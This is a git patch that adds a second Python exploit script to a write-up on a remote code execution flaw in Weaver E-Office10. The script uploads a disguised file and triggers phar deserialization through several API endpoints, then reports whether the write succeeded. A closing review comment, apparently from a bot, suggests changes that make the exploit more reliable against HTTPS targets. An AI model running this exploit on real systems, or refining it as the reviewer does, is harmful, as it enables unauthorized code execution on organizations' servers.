From 5047249fc49e774167f9d233925b85ba2c1f6d0a Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Sun, 7 Apr 2024 10:52:59 +0800 Subject: [PATCH] =?UTF-8?q?Update=20=E6=B3=9B=E5=BE=AEE-Office10=E7=89=88?= =?UTF-8?q?=E6=9C=AC=E5=B0=8F=E4=BA=8Ev10.0=5F20240222=E5=AD=98=E5=9C=A8?= =?UTF-8?q?=E8=BF=9C=E7=A8=8B=E4=BB=A3=E7=A0=81=E6=89=A7=E8=A1=8C=E6=BC=8F?= =?UTF-8?q?=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...本小于v10.0_20240222存在远程代码执行漏洞.md | 54 +++++++++++++++++++ 1 file changed, 54 insertions(+) diff --git a/泛微E-Office10版本小于v10.0_20240222存在远程代码执行漏洞.md b/泛微E-Office10版本小于v10.0_20240222存在远程代码执行漏洞.md index 8e560c9..446dbc8 100644 --- a/泛微E-Office10版本小于v10.0_20240222存在远程代码执行漏洞.md +++ b/泛微E-Office10版本小于v10.0_20240222存在远程代码执行漏洞.md 
@@ -154,6 +154,60 @@ if __name__ == '__main__':
 payload(url,cmd)
 ```
+## exp2
+```
+# -*- coding:utf-8 -*-
+import json
+import requests
+import urllib3
+import base64
+
+
+def payload(url):
+ urls = url + '/eoffice10/server/public/api/attachment/atuh-file'
+ hearder = {
+ 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5829.201 Safari/537.36'}
+ file = base64.b64decode( "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")
+ upload_file = {"Filedata": ("register.inc", file, "image/jpeg")}
+ urllib3.disable_warnings()
+ response = requests.post(url=urls, files=upload_file, headers=hearder)
+ response_text = response.text
+ attachment_id = json.loads(response_text)['data']['attachment_id']
+
+ urls = url + '/eoffice10/server/public/api/attachment/path/migrate'
+ headerss = {
+ 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5829.201 Safari/537.36',
+ 'Content-Type': 'application/x-www-form-urlencoded',
+ 'Accept-Encoding': 'gzip'
+ }
+ data1 = 'source_path=&desc_path=phar%3A%2F%2F..%2F..%2F..%2F..%2Fattachment%2F'
+ urllib3.disable_warnings()
+ response = requests.post(url=urls, headers=headerss, data=data1,verify=False )
+
+ urls = url + '/eoffice10/server/public/api/empower/import'
+ headersss = {
+ 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5829.201 Safari/537.36',
+ 'Content-Type': 'application/x-www-form-urlencoded',
+ 'Accept-Encoding': 'gzip'
+ }
+ urllib3.disable_warnings()
+ data2 = 'type=tttt&file=' + attachment_id
+ response = requests.post(url=urls, verify=False, headers=headersss, data=data2 )
+ response_text = response.text
+ if "no_file" in response_text:
+ print("写入成功")
+ else:
+ print("写入失败")
+
+
+if __name__ == '__main__':
+ url = input("url: ")
+ if not url.startswith(("http://", "https://")):
+ url = "http://" + url
+ if url.endswith("/"):
+ url = url[:-1]
+ payload(url)
+```
 ## 漏洞来源
 - https://mp.weixin.qq.com/s/45_7Qz8AH1w471rbtFCyjw
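Review bot: The first upload request in `payload()`, `requests.post(url=urls, files=upload_file, headers=hearder)`, is the only one of the three calls made without `verify=False`, so against an HTTPS target with a self-signed certificate (common for on-prem OA deployments) the script dies with an SSLError before the upload ever happens, despite the `urllib3.disable_warnings()` call directly above it; I would make the three calls consistent and bound them as well, e.g. `response = requests.post(url=urls, files=upload_file, headers=hearder, verify=False, timeout=10)`. The following `json.loads(response_text)['data']['attachment_id']` has no guard, so a patched or unreachable target yields a KeyError/JSONDecodeError traceback rather than a "not vulnerable" verdict; checking `response.ok` and using `.get('data', {})` before indexing would give a usable result. The closing `"no_file" in response_text` test is a string heuristic and the printed "写入成功"/"写入失败" says nothing about whether the uploaded `register.inc` was actually reached, so at minimum echo `response.status_code` and the body for manual confirmation. The script also leaves `register.inc` on the target with no cleanup step, which the write-up should state for anyone running it during an authorized assessment.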